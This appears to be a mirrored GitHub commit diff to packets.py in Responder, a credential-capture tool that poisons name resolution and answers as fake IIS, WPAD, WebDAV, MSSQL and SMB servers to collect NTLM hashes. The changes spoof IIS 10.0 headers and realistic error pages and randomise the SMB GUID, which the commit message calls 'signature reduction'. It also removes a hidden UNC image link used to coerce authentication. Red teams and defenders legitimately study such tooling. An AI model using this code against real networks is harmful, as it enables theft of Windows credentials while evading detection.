mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-06 04:51:23 -07:00
Fixed issue in http srv, more hashes & signature reduction.
This commit is contained in:
lgandx
parent
08e44d72ac
commit
66ee7f8f08
3 changed files with 147 additions and 35 deletions
132
packets.py
132
packets.py
|
|
@ -365,7 +365,7 @@ class NTLM_Challenge(Packet):
|
|||
("TargetInfoLen", "\x7e\x00"),
|
||||
("TargetInfoMaxLen", "\x7e\x00"),
|
||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
||||
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
||||
("TargetNameStr", settings.Config.Domain),
|
||||
("Av1", "\x02\x00"),#nbt name
|
||||
("Av1Len", "\x06\x00"),
|
||||
|
|
@ -426,25 +426,59 @@ class NTLM_Challenge(Packet):
|
|||
class IIS_Auth_401_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: Negotiate\r\n"),
|
||||
("WWW-Auth2", "WWW-Authenticate: NTLM\r\n"),
|
||||
("Len", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
||||
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
||||
fieldset{padding:0 15px 10px 15px;}
|
||||
h1{font-size:2.4em;margin:0;color:#FFF;}
|
||||
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
||||
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
||||
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
||||
background-color:#555555;}
|
||||
#content{margin:0 0 0 2%;position:relative;}
|
||||
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div id="header"><h1>Server Error</h1></div>
|
||||
<div id="content">
|
||||
<div class="content-container"><fieldset>
|
||||
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
||||
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
||||
</fieldset></div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
||||
class IIS_Auth_Granted(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\"+RespondWithIP()+"\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
|
||||
("Payload", ""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
|
@ -452,22 +486,29 @@ class IIS_Auth_Granted(Packet):
|
|||
class IIS_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWWAuth", "WWW-Authenticate: NTLM "),
|
||||
("Payload", ""),
|
||||
("Payload-CRLF", "\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload2", """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
||||
<HTML><HEAD><TITLE>Not Authorized</TITLE>
|
||||
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
||||
<BODY><h2>Not Authorized</h2>
|
||||
<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>
|
||||
</BODY></HTML>
|
||||
"""),
|
||||
])
|
||||
|
||||
def calculate(self,payload):
|
||||
self.fields["Payload"] = b64encode(payload)
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload2"]))
|
||||
|
||||
class WinRM_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 \r\n"),
|
||||
("Code", "HTTP/1.1 401\r\n"),
|
||||
("WWWAuth", "WWW-Authenticate: Negotiate "),
|
||||
("Payload", ""),
|
||||
("Payload-CRLF", "\r\n"),
|
||||
|
|
@ -483,21 +524,52 @@ class WinRM_NTLM_Challenge_Ans(Packet):
|
|||
class IIS_Basic_401_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
||||
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
|
||||
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Len", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
||||
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
||||
fieldset{padding:0 15px 10px 15px;}
|
||||
h1{font-size:2.4em;margin:0;color:#FFF;}
|
||||
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
||||
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
||||
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
||||
background-color:#555555;}
|
||||
#content{margin:0 0 0 2%;position:relative;}
|
||||
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div id="header"><h1>Server Error</h1></div>
|
||||
<div id="content">
|
||||
<div class="content-container"><fieldset>
|
||||
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
||||
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
||||
</fieldset></div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
||||
##### Proxy mode Packets #####
|
||||
class WPADScript(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
|
|
@ -514,7 +586,7 @@ class ServeExeFile(Packet):
|
|||
("ContentType", "Content-Type: application/octet-stream\r\n"),
|
||||
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("ContentDisp", "Content-Disposition: attachment; filename="),
|
||||
("ContentDiFile", ""),
|
||||
("FileCRLF", ";\r\n"),
|
||||
|
|
@ -536,7 +608,7 @@ class ServeHtmlFile(Packet):
|
|||
("ContentType", "Content-Type: text/html\r\n"),
|
||||
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
|
||||
|
|
@ -551,7 +623,7 @@ class ServeHtmlFile(Packet):
|
|||
class WPAD_Auth_407_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
|
||||
|
|
@ -567,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet):
|
|||
class WPAD_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWWAuth", "Proxy-Authenticate: NTLM "),
|
||||
|
|
@ -583,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet):
|
|||
class WPAD_Basic_407_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
||||
|
|
@ -600,7 +672,7 @@ class WEBDAV_Options_Answer(Packet):
|
|||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
|
||||
|
|
@ -688,7 +760,7 @@ class MSSQLNTLMChallengeAnswer(Packet):
|
|||
("TargetInfoLen", "\x7e\x00"),
|
||||
("TargetInfoMaxLen", "\x7e\x00"),
|
||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
||||
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
||||
("TargetNameStr", settings.Config.Domain),
|
||||
("Av1", "\x02\x00"),#nbt name
|
||||
("Av1Len", "\x06\x00"),
|
||||
|
|
@ -1696,7 +1768,7 @@ class SMB2NegoAns(Packet):
|
|||
("Signing", "\x01\x00"),
|
||||
("Dialect", "\xff\x02"),
|
||||
("Reserved", "\x00\x00"),
|
||||
("Guid", "\xee\x85\xab\xf7\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x76\xa9"),
|
||||
("Guid", urandom(16).decode('latin-1')),
|
||||
("Capabilities", "\x07\x00\x00\x00"),
|
||||
("MaxTransSize", "\x00\x00\x10\x00"),
|
||||
("MaxReadSize", "\x00\x00\x10\x00"),
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue